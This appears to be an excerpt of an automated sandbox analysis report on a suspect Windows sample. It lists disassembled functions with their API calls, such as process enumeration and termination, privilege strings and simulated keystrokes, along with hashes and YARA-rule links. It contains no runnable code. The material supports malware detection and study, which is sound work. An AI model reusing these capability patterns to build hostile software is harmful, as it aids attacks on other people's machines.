                                                                                                                                                  • Instruction ID: 0f12ca803dd456961f378a5405c415128bcb92563cb3c400ec1810a32edd116f
                                                                                                                                                  • Opcode Fuzzy Hash: b81018c5d368d022e0d87dde81b2718c3166f4065abd3568de010eb6ab87cf81
                                                                                                                                                  • Instruction Fuzzy Hash: 42F14C75A10209EFCF14DF94C884EAEB7B9FF45315F108198F916AB2A1CB71AE85CB50
                                                                                                                                                  Function 00C2527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C24BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C23B8A,?), ref: 00C24BE0
                                                                                                                                                    • Part of subcall function 00C24BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C23B8A,?), ref: 00C24BF9
                                                                                                                                                    • Part of subcall function 00C24FEC: GetFileAttributesW.KERNEL32(?,00C23BFE), ref: 00C24FED
                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00C252FB
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C25315
                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00C25330
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 793581249-0
                                                                                                                                                  • Opcode ID: 5aec8c7ec8876cee2625d6f73b3595100dc5d958279da1522e00e545348e378a
                                                                                                                                                  • Instruction ID: 296f67dd2500d6a62de07e744f2177d36eb4f177c01ee286559cfe43d3a14059
                                                                                                                                                  • Opcode Fuzzy Hash: 5aec8c7ec8876cee2625d6f73b3595100dc5d958279da1522e00e545348e378a
                                                                                                                                                  • Instruction Fuzzy Hash: 215184B20087949BC724EBA4D881DDFB3EC9F85301F50491EF599D3152EF74A6888756
                                                                                                                                                  Function 00C48C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C48D24
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                                  • Opcode ID: f5da4fcf554994853b8d642a660e92067a1f3c801e2245972ff3e22f12d75a02
                                                                                                                                                  • Instruction ID: f62b0dc2443a83b3650def2d45299e3ea5bddd084f6cf7f90af34857c1ab9864
                                                                                                                                                  • Opcode Fuzzy Hash: f5da4fcf554994853b8d642a660e92067a1f3c801e2245972ff3e22f12d75a02
                                                                                                                                                  • Instruction Fuzzy Hash: 3D51BE34A41205BFEF209B28CC89B9D3BA4BB05361F644515FA24E61E1CF71EE98DB60
                                                                                                                                                  Function 00BC2F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00BFC638
                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00BFC65A
                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BFC672
                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00BFC690
                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BFC6B1
                                                                                                                                                  • DestroyIcon.USER32(00000000), ref: 00BFC6C0
                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BFC6DD
                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00BFC6EC
                                                                                                                                                    • Part of subcall function 00C4AAD4: DeleteObject.GDI32(00000000,?,?,?,00BC2FDC,00000000), ref: 00C4AB0D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2819616528-0
                                                                                                                                                  • Opcode ID: 15d1755e1e802876c821815fa26045c249229bc8ab62f1f10809b1f5f2568b1c
                                                                                                                                                  • Instruction ID: 3f9c8bf26413c7e647a6cafbc108731040a8bd679c10941011575e8f2c74a41d
                                                                                                                                                  • Opcode Fuzzy Hash: 15d1755e1e802876c821815fa26045c249229bc8ab62f1f10809b1f5f2568b1c
                                                                                                                                                  • Instruction Fuzzy Hash: 09515674604209AFDB20DF24CD85FAA7BF5EB48711F20456CF942E7290EB71E890DB60
                                                                                                                                                  Function 00C1A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C1B52D: GetWindowThreadProcessId.USER32(?,00000000,00000000,?,00C1A23B,?,00000001), ref: 00C1B54D
                                                                                                                                                    • Part of subcall function 00C1B52D: GetCurrentThreadId.KERNEL32(00000000,?,00C1A23B,?,00000001), ref: 00C1B554
                                                                                                                                                    • Part of subcall function 00C1B52D: AttachThreadInput.USER32(00000000,?,00C1A23B,?,00000001), ref: 00C1B55B
                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000,?,00000001), ref: 00C1A246
                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000,?,00000001), ref: 00C1A263
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C1A266
                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C1A26F
                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000,?,00000001), ref: 00C1A28D
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C1A290
                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C1A299
                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C1A2B0
                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C1A2B3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                                  • Opcode ID: 557375e05f1462d100fae6263c4809ff71c7bcb4c9e5363e0179eedfdc698837
                                                                                                                                                  • Instruction ID: 616cf671edb15b763a1280bd011365d28ec1df0b79710fe8d3199f21663fe5f9
                                                                                                                                                  • Opcode Fuzzy Hash: 557375e05f1462d100fae6263c4809ff71c7bcb4c9e5363e0179eedfdc698837
                                                                                                                                                  • Instruction Fuzzy Hash: 6F1108B5550A18BEF7106F609C49FAE3F2DEB4D752F210415F744AB0D0CAF35C90AAA0
                                                                                                                                                  Function 00C194D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C1915A,00000B00,?,?), ref: 00C194E2
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00C1915A,00000B00,?,?), ref: 00C194E9
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C1915A,00000B00,?,?), ref: 00C194FE
                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00C1915A,00000B00,?,?), ref: 00C19506
                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00C1915A,00000B00,?,?), ref: 00C19509
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C1915A,00000B00,?,?), ref: 00C19519
                                                                                                                                                  • GetCurrentProcess.KERNEL32(00C1915A,00000000,?,00C1915A,00000B00,?,?), ref: 00C19521
                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00C1915A,00000B00,?,?), ref: 00C19524
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00C1954A,00000000,00000000,00000000,?,00C1915A,00000B00,?,?), ref: 00C1953E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1957940570-0
                                                                                                                                                  • Opcode ID: 47ef29f6c50a3e7c04fe9484e14fe05053d8a9666539f5af11c2ddf8d94ccaa7
                                                                                                                                                  • Instruction ID: 8e722437f6889c4e91cac3d2ce899ceb90c686d4c782baa1795ea5dbe9e13d40
                                                                                                                                                  • Opcode Fuzzy Hash: 47ef29f6c50a3e7c04fe9484e14fe05053d8a9666539f5af11c2ddf8d94ccaa7
                                                                                                                                                  • Instruction Fuzzy Hash: 1E01BBB9240704BFE710ABA5DC4DF6F7BACEB89712F104411FA05EB1A1DA709840CB21
                                                                                                                                                  Function 00C3A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                  • API String ID: 0-572801152
                                                                                                                                                  • Opcode ID: d61f9c40198240bf6f0eb1ae8e3152d819b9b99ea0715e2b68c560883b732662
                                                                                                                                                  • Instruction ID: d26f61493aaf60be10a620780268e0805a4ea00c2f38aecde8d1ba1461071ab3
                                                                                                                                                  • Opcode Fuzzy Hash: d61f9c40198240bf6f0eb1ae8e3152d819b9b99ea0715e2b68c560883b732662
                                                                                                                                                  • Instruction Fuzzy Hash: E1C1D371A1021A9FDF14CF98C884BAEB7F5FF48310F148429E955AB280E770DE54CB91
                                                                                                                                                  Function 00C397FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset
                                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                  • API String ID: 2102423945-625585964
                                                                                                                                                  • Opcode ID: da2955a1c801ffa5ae5c59912193eb22268f92590054c7942fdb395c5f287c22
                                                                                                                                                  • Instruction ID: 0a1e9822f5ec59b2d5793a79a386f6252bf58b372f1fc92bc6517aef88076a59
                                                                                                                                                  • Opcode Fuzzy Hash: da2955a1c801ffa5ae5c59912193eb22268f92590054c7942fdb395c5f287c22
                                                                                                                                                  • Instruction Fuzzy Hash: 97919E71A10319ABDF24DFA5C848FAEBBB8EF45710F10855DF519AB281D7B09A44CFA0
                                                                                                                                                  Function 00C473A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010,?,?,SysListView32,00C50980,00000000,?,?,?,?,?,?,00000000), ref: 00C47449
                                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?,?,?,SysListView32,00C50980,00000000,?,?,?,?,?,?,00000000), ref: 00C4745D
                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C47477
                                                                                                                                                  • _wcscat.LIBCMT ref: 00C474D2
                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?,?,?,00C877C4), ref: 00C474E9
                                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C47517
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                                  • String ID: SysListView32
                                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                                  • Opcode ID: 0ea08743283f91abfa5c149423a2b8b7cc4480b29c5c3e2760a4d9f903dd3c84
                                                                                                                                                  • Instruction ID: 7aadca1f1fb10d13c2f334e92e48a46bf1d34dbcdc9c0b4b2df326efe1cbf036
                                                                                                                                                  • Opcode Fuzzy Hash: 0ea08743283f91abfa5c149423a2b8b7cc4480b29c5c3e2760a4d9f903dd3c84
                                                                                                                                                  • Instruction Fuzzy Hash: A5417F71A04348ABEB219F64CC85BEE77E8FF08350F10456AFA95E7191D7719D84CB50
                                                                                                                                                  Function 00C3F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C24148: CreateToolhelp32Snapshot.KERNEL32 ref: 00C2416D
                                                                                                                                                    • Part of subcall function 00C24148: Process32FirstW.KERNEL32(00000000,?), ref: 00C2417B
                                                                                                                                                    • Part of subcall function 00C24148: CloseHandle.KERNEL32(00000000), ref: 00C24245
                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3F08D
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00C3F0A0
                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3F0CF
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C3F14C
                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00C3F157
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00C3F18C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                                  • Opcode ID: 2d040123713a136e8c54e5a00305dcf6efbd504292acdded5f4f12a093d344d2
                                                                                                                                                  • Instruction ID: 2744f5b84b78015ecd89493f9db6a192d6acbc6a8ee054b40b11a2777f8b47da
                                                                                                                                                  • Opcode Fuzzy Hash: 2d040123713a136e8c54e5a00305dcf6efbd504292acdded5f4f12a093d344d2
                                                                                                                                                  • Instruction Fuzzy Hash: 5E41EE312003019FDB15EF24DCA5FAEB7A1AF80310F24846DF8469B2E2CB70AD45DB96
                                                                                                                                                  Function 00C234DD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03,00C87A2C,00C87890,00C87A30,00C87890,00C87890,?,00C10D1F,FFFFFFFF,01702588,00C87A30), ref: 00C2357C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconLoad
                                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                                  • Opcode ID: ce14f4539edec63789ddcd96d3070ac2d943147fbc38dbab193e9f86f8b34700
                                                                                                                                                  • Instruction ID: 399b847d1453bb8c2944b50d7de4c26bdd400d5dd0c1190f70af76a1b7460450
                                                                                                                                                  • Opcode Fuzzy Hash: ce14f4539edec63789ddcd96d3070ac2d943147fbc38dbab193e9f86f8b34700
                                                                                                                                                  • Instruction Fuzzy Hash: F51127316083E6BEAB004A15EC86E6E77DCDF05760B20007EFA18A6581E7B86F4056A1
                                                                                                                                                  Function 00C247E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C24802
                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00C24809
                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C2481F
                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00C24826
                                                                                                                                                  • _wprintf.LIBCMT ref: 00C2484C
                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C2486A
                                                                                                                                                  Strings
                                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00C24847
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                                  • Opcode ID: d34f6643195d9572fecb5e977bfaa6c66a6912e4b3cd50abb7fc65eafa56e744
                                                                                                                                                  • Instruction ID: cd72bd1db4ee9cb977fb565b10296cc5b7678cadd0d0e1c350bb76b565bf6145
                                                                                                                                                  • Opcode Fuzzy Hash: d34f6643195d9572fecb5e977bfaa6c66a6912e4b3cd50abb7fc65eafa56e744
                                                                                                                                                  • Instruction Fuzzy Hash: 1E014FFA9003487FE71197A09D89FFB736CEB08301F5005A5BB49E2041EA749E844B75
                                                                                                                                                  Function 00C4DB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,00BC1CE4,?), ref: 00BC29F3
                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00C4DB42
                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00C4DB62
                                                                                                                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C4DD9D
                                                                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C4DDBB
                                                                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C4DDDC
                                                                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 00C4DDFB
                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C4DE20
                                                                                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C4DE43
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1211466189-0
